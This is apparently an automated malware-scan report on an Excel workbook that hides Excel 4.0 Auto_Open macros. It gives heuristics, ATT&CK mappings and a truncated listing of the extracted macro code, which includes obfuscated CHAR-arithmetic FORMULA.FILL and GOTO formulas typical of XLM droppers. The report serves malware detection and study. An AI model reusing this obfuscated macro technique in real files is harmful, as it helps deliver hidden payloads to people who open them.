MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains Excel 4.0 macros, specifically an Auto_Open entry, which is a known technique for executing malicious code upon opening the document. The heuristics indicate the use of dangerous functions like RUN, suggesting the macro is designed to download and execute a secondary payload. No specific family could be identified, and the macro content is truncated, limiting further analysis.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 129578 bytes |
SHA-256: 3f21f2e11f8f51f8d04c56f2545bf555052af40335f89015042d38fc00d549f5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!DP61490 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,GU7,"",174.00000000000000000000 ' Sheet,HL12,"",1.17346938775510212238 ' Sheet,EZ21,"",-1.58677685950413227545 ' Sheet,BI38,"",-1.21052631578947367252 ' Sheet,CC60,"",0.22844827586206897796 ' Sheet,DO132,"",-0.50000000000000000000 ' Sheet,GX222,"",5.50000000000000000000 ' Sheet,IB290,"",372.00000000000000000000 ' Sheet,DQ324,"",-0.40157480314960630752 ' Sheet,HT334,"",-123.00000000000000000000 ' Sheet,L356,"",2.10000122070312489342 ' Sheet,BK381,"",-3.94366197183098599055 ' Sheet,BL382,"",172.00000000000000000000 ' Sheet,JM382,"",-236.00000000000000000000 ' Sheet,JR477,"",0.85820895522388063181 ' Sheet,IM495,"",-285.00000000000000000000 ' Sheet,IF539,"",36.00000000000000000000 ' Sheet,GH591,"",0.03296703296703296787 ' Sheet,DS615,"",0.45558086560364463580 ' Sheet,IS738,"",177.00000000000000000000 ' Sheet,FA810,"",27.33333333333333214910 ' Sheet,HY812,"",0.53246753246753242284 ' Sheet,BM817,"",-50.50000000000000000000 ' Sheet,JP837,"",11.42500976562499914735 ' Sheet,BO854,"",5.16470588235294059132 ' Sheet,GO863,"",4.32352941176470562112 ' Sheet,FZ892,"",24.00000000000000000000 ' Sheet,A914,"",95.00000000000000000000 ' Sheet,JJ968,"",-122.00000000000000000000 ' Sheet,CA996,"",107.00000000000000000000 ' Sheet,EJ1046,"",0.54421768707482998106 ' Sheet,HF1078,"",8.00000000000000000000 ' Sheet,JN1099,"",-236.00000000000000000000 ' Sheet,V1101,"",0.62345679012345678327 ' Sheet,JD1101,"",0.00137362637362637373 ' Sheet,BW1110,"",63.50000000000000000000 ' Sheet,IS1122,GOTO(DJ57715),"" ' Sheet,EY1219,"",-0.43229166666666668517 ' Sheet,HW1225,"",1.50000000000000000000 ' Sheet,GK1248,"",27.00000000000000000000 ' Sheet,HT1249,"",1.26724137931034475102 ' Sheet,DO1259,"",0.07500003814697266125 ' Sheet,A1287,"",-116.00000000000000000000 ' Sheet,FL1310,"",3.05660277358490573008 ' Sheet,HU1324,"",-399.00000000000000000000 ' Sheet,HI1478,"",99.87500000000000000000 ' Sheet,JI1493,"",-70.50000000000000000000 ' Sheet,II1515,"",-0.26071428571428573173 ' Sheet,JD1517,"",94.00000000000000000000 ' Sheet,CJ1523,"",-22.50000000000000000000 ' Sheet,CC1554,"",330.00000000000000000000 ' Sheet,EI1648,"",-244.00000000000000000000 ' Sheet,GR1664,"",-132.00000000000000000000 ' Sheet,BJ1665,"",-274.00000000000000000000 ' Sheet,DH1685,"",-0.31496062992125983815 ' Sheet,GD1702,"",2.34343434343434342537 ' Sheet,IE1731,"",-0.57894736842105265495 ' Sheet,HU1799,"",1.50657894736842101757 ' Sheet,BZ1914,"",-401.00000000000000000000 ' Sheet,ET1960,"",0.49137931034482756898 ' Sheet,A1968,"",397.00000000000000000000 ' Sheet,Y1968,"",5.09090909090909082835 ' Sheet,FD1970,"",58.59999999999999431566 ' Sheet,EC2032,"FORMULA.FILL(CHAR(HY55110/G60158)&CHAR(HY55110+Z51108)&CHAR(CB22708/EI47194)&CHAR(DB28754*IW49605)&CHAR(Z54421-EZ63919)&CHAR(HM28055/FE59028)&CHAR(BZ12573/IS58990)&CHAR(IS38454/FY46172)&CHAR(BZ12573*ET1960)&CHAR(DB28754+S40011)&CHAR(BZ12573/BV34606)&CHAR(Z54421-EJ57661)&CHAR(BZ12573+HQ64111)&CHAR(CB22708+GB63842)&CHAR(JR61789-HP16328)&CHAR(Z54421/BL29864)&CHAR(CB22708-JA3640)&CHAR(Z54421-BB36518)&CHAR(JR61789*CD27369)&CHAR(DB28754+FV40527)&CHAR(JR61789*DJ24284)&CHAR(Z54421*M46965)&CHAR(IS38454/EX3945)&CHAR(HM28055-M49030)&CHAR(HM28055/IS17793)&CHAR(BZ12573+BW54595)&CHAR(BM37385*DM21936)&CHAR(BM37385+CH9858)&CHAR(HM28055+U5101)&CHAR(CB22708-G15265),FM980)","" ' Sheet,EC2033,GOTO(H26846),"" ' Sheet,BX2048,"",-95.00000000000000000000 ' Sheet,JB2057,"",1.72941176470588242609 ' Sheet,BM2075,"",1.40259740259740262047 ' Sheet,CT2093,"",90.00000000000000000000 ' Sheet,IP2100,"",0.84615384615384614531 ' Sheet,I ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.